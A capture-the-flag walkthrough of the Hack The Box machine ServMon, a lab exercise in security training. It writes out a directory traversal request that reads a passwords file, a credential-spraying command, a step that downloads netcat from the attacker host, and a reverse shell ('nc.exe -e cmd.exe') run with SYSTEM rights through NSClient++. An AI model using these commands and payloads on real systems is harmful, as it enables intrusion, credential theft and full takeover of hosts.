htb-writeups

ServMon HTB Walkthrough

A comprehensive penetration testing walkthrough for the ServMon machine from Hack The Box, detailing reconnaissance, vulnerability assessment, exploitation, and privilege escalation.

Executive Summary

ServMon is a Windows-based vulnerable machine that demonstrates common security misconfigurations in real-world environments. The box involves multiple attack vectors including FTP anonymous access, web application vulnerabilities, and service misconfigurations leading to full system compromise.

Key Vulnerabilities Exploited:

FTP Anonymous Access
NVMS 1000 Directory Traversal
Weak Password Policies
NSClient++ Privilege Escalation

Reconnaissance

Network Scanning

Initial network reconnaissance was performed to identify open ports and services:

export target=10.129.227.77

# Comprehensive port scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Discovered Ports:

21/tcp - FTP
22/tcp - SSH
80/tcp - HTTP
135/tcp - RPC
139/tcp - NetBIOS
445/tcp - SMB
5666/tcp - NRPE
6063/tcp - Unknown
6699/tcp - Unknown
8443/tcp - HTTPS (Alternative)
49664-49670/tcp - Windows RPC

Service Enumeration

Detailed service version detection and script scanning:

sudo nmap -sC -sV -p 21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -T4 $target

Key Findings:

FTP service allowing anonymous login
HTTP service running NVMS 1000 software

Multiple Windows-specific services indicating a Windows host

Enumeration

FTP Service Analysis

Anonymous FTP access revealed sensitive information:

wget -r ftp://anonymous:@10.129.227.77

Discovered Files:

Users/Nadine/Confidential.txt - Internal communication about password files
Users/Nathan/Notes to do.txt - TODO list revealing security practices

┌──(aravinda㉿kali)-[~/…/servmon/10.129.227.77/Users/Nadine]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine 

┌──(aravinda㉿kali)-[~/…/servmon/10.129.227.77/Users/Nathan]
└─$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint                                                                                                                      

Web Application Assessment

The web service on port 80 hosted NVMS 1000 software:

http://10.129.227.77/Pages/login.htm

Vulnerability Research:

searchsploit 'nvms 1000'

Identified Exploits:

Directory Traversal vulnerability (CVE-2019-20085)
Multiple public exploits available

Directory Traversal Exploitation

Using the directory traversal vulnerability to access sensitive files:

Initial request

HTTP Request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.129.227.77

Modified to access user files:

GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt HTTP/1.1
Host: 10.129.227.77

Retrieved Credentials:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Initial Foothold

Credential Testing

Using identified usernames and passwords for authentication:

# User list
nathan
nadine
administrator

# Password cracking/brute-forcing
crackmapexec ssh 10.129.227.77 -u users.txt -p pass.txt --continue-on-success

Successful Authentication:

Username: nadine
Password: L1k3B1gBut7s@W0rk

Initial Access

ssh nadine@10.129.227.77

User Flag:

type C:\Users\Nadine\Desktop\user.txt
0c402c1a0c6ca9d60dde2191ab14eb45

Privilege Escalation

Internal Service Discovery

Discovered NSClient++ service on port 8443:

# SSH port forwarding for internal service access
ssh nadine@10.129.227.77 -L 8443:127.0.0.1:8443

NSClient++ Analysis

Accessed the web interface at https://127.0.0.1:8443/

Retrieved NSClient++ Password:

nscp web --password --display
Current password: ew2x6SsGTxjRwXOT

Exploitation Strategy

Based on research from Exploit-DB (46802), NSClient++ allows execution of external scripts with SYSTEM privileges.

Attack Procedure:

Prepare Payload:

# Download netcat to target
curl 10.10.14.106/nc.exe -o C:\programdata\nc.exe
   
# Create batch file for reverse shell
echo C:\programdata\nc.exe -e cmd.exe 10.10.14.106 4444 > C:\programdata\exploit.bat

Setup Listener:
```
nc -nlvp 4444
```
Configure NSClient++ Script:
- login

Navigate to Settings > External Scripts > Scripts
Add new script named “foobar”
Command: c:\programdata\exploit.bat
Save configuration and reload service

Execute Script:
- Access https://127.0.0.1:8443/index.html#/queries/foobar

Click “Run” to execute the script

Root Access

Successful SYSTEM Shell:

whoami
nt authority\system

type C:\Users\Administrator\Desktop\root.txt
8490b03644b0b4c76d393cc428dd230b

Lessons Learned

Security Misconfigurations

FTP Service:
- Anonymous access enabled
- Sensitive files accessible without authentication
Web Application:
- Outdated NVMS 1000 software with known vulnerabilities
- Directory traversal vulnerability not patched
Password Management:
- Weak password policies
- Passwords stored in insecure locations
- Password reuse across accounts
Service Configuration:
- NSClient++ configured with excessive privileges
- External script execution without proper sandboxing

Defense Recommendations

Network Security:
- Disable unnecessary services (FTP, unused ports)
- Implement network segmentation
- Use firewall rules to restrict access
Application Security:
- Regular vulnerability assessments and patching
- Web application firewall implementation
- Secure coding practices
Access Control:
- Strong password policies and multi-factor authentication
- Principle of least privilege for service accounts
- Regular access reviews and audits
Monitoring:
- File integrity monitoring
- Log analysis for suspicious activities
- Intrusion detection systems